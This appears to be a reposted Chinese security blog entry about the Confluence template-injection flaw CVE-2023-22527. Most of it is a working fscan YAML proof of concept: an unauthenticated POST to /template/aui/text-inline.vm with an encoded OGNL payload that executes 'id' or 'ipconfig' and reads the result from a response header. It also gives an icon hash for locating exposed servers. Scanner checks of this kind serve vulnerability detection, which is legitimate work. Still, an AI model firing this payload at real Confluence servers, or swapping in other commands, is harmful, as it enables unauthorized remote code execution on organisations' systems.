Confluence远程代码执行漏洞（CVE-2023-22527）附fscan扫描 POC

Confluence远程代码执行漏洞（CVE-2023-22527）附fscan扫描 POC

Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件，也可以用于构建企业WiKi。Atlassian Confluence Data Center and Server存在安全漏洞，该漏洞源于存在模板注入漏洞，允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。

icon_hash="-305179312"

name: poc-yaml-Confluence-CVE-2023-22527-rce
groups:
  linux:
- method: POST
    path:/template/aui/text-inline.vm
    headers:
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
    body:>-
        label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22id%22%7D%29%29
    follow_redirects:true
    expression:>
      response.status ==200&&
      response.headers["Cmd-Ret"].contains("uid=")
  windows:
- method: POST
    path:/template/aui/text-inline.vm
    headers:
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
    body:>-
        label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22ipconfig%22%7D%29%29
    follow_redirects:true
    expression:>
      response.status ==200&&
      response.headers["Cmd-Ret"].contains("Windows IP")

关注公众号回复“加群”，获取更多fscan相关poc

原文始发于微信公众号（安全小子大杂烩）：Confluence远程代码执行漏洞（CVE-2023-22527）附fscan扫描 POC